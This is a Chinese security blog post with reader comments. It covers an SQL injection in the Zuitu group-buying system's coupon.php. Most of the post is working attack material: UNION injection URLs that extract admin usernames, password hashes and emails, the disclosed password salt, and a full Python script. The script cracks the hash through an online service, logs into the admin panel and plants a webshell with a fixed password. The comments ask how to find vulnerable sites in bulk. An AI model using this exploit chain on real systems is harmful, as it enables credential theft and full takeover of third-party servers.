最土团购系统通用注入

基础函数过滤不全导致注射。 ajax/coupon.php exp: [php] ajax/coupon.php?action=consume&secret=8&id=2%27)/**/and/**/1=2/**/union/**/select/**/1,2,0,4,5,6,concat(0x31,0x3a,username,0x3a,password,0x3a,email,0x3a),8,9,10,11,9999999999,13,14,15,16/**/from/**/user/**/where/**/manager=0x59/**/limit/**/0,1%23 [/php] 如果不行换成15位 [php] ajax/coupon.php?action=consume&secret=8&id=2%27)/**/and/**/1=2/**/union/**/select/**/1,2,0,4,5,6,concat(0x31,0x3a,username,0x3a,password,0x3a,email,0x3a),8,9,10,11,9999999999,13,14,15/**/from/**/user/**/where/**/manager=0x59/**/limit/**/0,1%23 [/php] 加密方式md5(password.'@4!@#$%@') 爆出来的md5后面加上salt(@4!@#$%@) 虽然停止开发了,但是谷歌一下还是有许多人用的。 tu 附上一枚sql注射到getshell的exp: [php] #!/usr/bin/env python #coding=utf-8 import sys; import re; import requests; import cookielib; import urllib; import urllib2; def main(): url=sys.argv[1]; if len(sys.argv)==2: Exploit(url); pass; def Exploit(url): print "Use of......."; headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}; exp=("/ajax/coupon.php?action=consume&secret=8&id=2%27)/**/and/**/1=2/**/union/**/select/**/1,2,0,4,5,6,concat(0x31,0x3a,username,0x3a,password,0x3a,email,0x3a),8,9,10,11,9999999999,13,14,15,16/**/from/**/user/**/where/**/manager=0x59/**/limit/**/0,1%23","/ajax/coupon.php?action=consume&secret=8&id=2%27)/**/and/**/1=2/**/union/**/select/**/1,2,0,4,5,6,concat(0x31,0x3a,username,0x3a,password,0x3a,email,0x3a),8,9,10,11,9999999999,13,14,15/**/from/**/user/**/where/**/manager=0x59/**/limit/**/0,1%23"); for i in range(2): htmlcontent=requests.get(url+exp[i],headers=headers).text.encode('utf-8'); Matching=re.compile(r'\:(\w+\:\w+)\:'); result=Matching.findall(htmlcontent); if result: print u"Use complete "+result[0]+":@4!@#$%@"; md5Crack(result[0],url); pass; def md5Crack(result,posturl): resul=result.split(':')[1]+":@4!@#$%@"; url="http://www.cmd5.com/default.aspx"; headers = {'Referer':'http://www.cmd5.com/default.aspx','Content-Type':'application/x-www-form-urlencoded','Accept-Language':'zh-CN,zh;q=0.8','User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Cookie':'ASP.NET_SessionId=duo0vysxepmc0mwdtvtlz033; CNZZDATA3819543=cnzz_eid%3D1447456137-1406904769-%26ntime%3D1412593037'}; data =urllib.urlencode({"__EVENTTARGET":"Button1","ctl00$ContentPlaceHolder1$TextBoxInput":resul,"ctl00$ContentPlaceHolder1$InputHashType":"md5","ctl00$ContentPlaceHolder1$Button1":"解密","ctl00$ContentPlaceHolder1$HiddenField1":"","ctl00$ContentPlaceHolder1$HiddenField2":"awuMpLTA7raz0/SGwIRToWC1ErLhTCEb7j0RhX44KQ6gSJa0jXKFj0GWMsuyev0h"}); req = urllib2.Request(url,data,headers); htmlcontent= urllib2.urlopen(req).read(); if re.findall(r'购买',htmlcontent): print u"可以购买"; Choice=raw_input("是否getshell Y/N:".decode('utf-8').encode('gbk')).upper(); if Choice=='Y': login(posturl,result); pass; elif Choice=='N': print u"感谢你的使用"; else: print u"不能购买请修改语句查询下一个用户试试"; Choice=raw_input("是否getshell Y/N:".decode('utf-8').encode('gbk')).upper(); if Choice=='Y': login(posturl,result); pass; elif Choice=='N': print u"感谢你的使用"; def login(url,result): user=result.split(':')[0]; passwd=raw_input("请输入你破解出来的密码:".decode('utf-8').encode('gbk')); geturl=url+"/manage/login.php"; getur=url+"/manage/index.php"; content=urllib2.urlopen(url); res=content.getcode(); if res==200: posturl=url+"/manage/system/template.php?id=about_job.html"; headers = {'Referer':getur,'Content-Type':'application/x-www-form-urlencoded','Accept-Language':'zh-CN,zh;q=0.8','User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Cookie':'bdshare_firstime=1408212168656; CNZZDATA5760804=cnzz_eid%3D1828295659-1408725529-%26ntime%3D1408776317; iweb_shoppingcart=15f6e9c7a6MDEwODAxMDExMDFkYThlMDFmNTVlZmo4MjkzYDIyM2F7Jmdqb2dxJz9bWCQmeXNvZHxidCYzW115; iweb_safecode=96aeed3e1cNDg4MDgxMDg1M2YxMDk9Nmo2NGc7ZDFhYjlmMjs6PDA; CKFinder_Path=Files%3A%2F%3A1; JishiGou_ra1GaN_auth=97e5%2FUHqnOh1L3nSOMKg2byZPlbiUaCpoxnvrVIL2nEon1EsMPKJvqvEkcEu7e8Yb0aXEg0w5fvKTBUco%2FEL; JishiGou_ra1GaN_sid=2Ix1XP; AJSTAT_ok_times=1; CNZZDATA1670348=cnzz_eid%3D166368451-1411712331-time%3D1412029938; FINDER_showname=on; FINDER_showsize=off; FINDER_showtime=off; FINDER_order=name; FINDER_orderDesc=off; FINDER_view=thumbs; FINDER_displaySettings=off; ECS[visit_times]=16; PHPSESSID=p6fld8b6dvthgcs86iu60ikhn5'}; data =urllib.urlencode({"username":user,"password":passwd,"commit":"登录"}); cj = cookielib.LWPCookieJar(); cookie_support = urllib2.HTTPCookieProcessor(cj) opener = urllib2.build_opener(cookie_support, urllib2.HTTPHandler); urllib2.install_opener(opener); req = urllib2.Request(geturl,data,headers); urllib2.urlopen(req).read(); getshell(url,posturl); else: print u"后台地址已修改请找到真实后台地址再进行操作"; def getshell(url,posturl): url=url+"/about/job.php"; headers = {'Referer':posturl,'Content-Type':'application/x-www-form-urlencoded','Accept-Language':'zh-CN,zh;q=0.8','User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Cookie':'bdshare_firstime=1408212168656; CNZZDATA5760804=cnzz_eid%3D1828295659-1408725529-%26ntime%3D1408776317; iweb_shoppingcart=15f6e9c7a6MDEwODAxMDExMDFkYThlMDFmNTVlZmo4MjkzYDIyM2F7Jmdqb2dxJz9bWCQmeXNvZHxidCYzW115; iweb_safecode=96aeed3e1cNDg4MDgxMDg1M2YxMDk9Nmo2NGc7ZDFhYjlmMjs6PDA; CKFinder_Path=Files%3A%2F%3A1; JishiGou_ra1GaN_auth=97e5%2FUHqnOh1L3nSOMKg2byZPlbiUaCpoxnvrVIL2nEon1EsMPKJvqvEkcEu7e8Yb0aXEg0w5fvKTBUco%2FEL; JishiGou_ra1GaN_sid=2Ix1XP; AJSTAT_ok_times=1; CNZZDATA1670348=cnzz_eid%3D166368451-1411712331-http%253A%252F%252Flocalhost%252F%26ntime%3D1412029938; FINDER_showname=on; FINDER_showsize=off; FINDER_showtime=off; FINDER_order=name; FINDER_orderDesc=off; FINDER_view=thumbs; FINDER_displaySettings=off; ECS[visit_times]=16; PHPSESSID=p6fld8b6dvthgcs86iu60ikhn5'}; data =urllib.urlencode({"template_id":"about_job.html","content":"","commit":"保存"}); #cj = cookielib.LWPCookieJar(); #cookie_support = urllib2.HTTPCookieProcessor(cj); #opener = urllib2.build_opener(cookie_support, urllib2.HTTPHandler); #urllib2.install_opener(opener); req=urllib2.Request(posturl,data,headers); urllib2.urlopen(req).read(); html=requests.get(url).text; if re.findall(r'fuck web',html): print u"恭喜getshell成功\n"; print u"shell地址: "+url; print u"密码:love"; else: print u"getshell失败,请不要气馁,手工再试试,可能有狗"; if __name__ == '__main__': main(); [/php]

5 条评论

  1. test

    想问下 最土的MD5如何破解?

    1. 0day5
      @test

      加上那一串固定的,然后丢到cmd5里面去解密,选择dicuz的类型

  2. null

    我在想你是怎么绕过 getdbrowbyid中的 if(preg_match('/[^\w\-\_]/', implode(' ',$ids))) return array(); 的? 或者说你测的版本里没有这个。。。

    1. 0day5
      @null

      我测试的版本没有这个哟~

      1. Icebreaker
        @0day5

        :?: 怎么批量搜索这个系统啊,关键字是什么啊

发表评论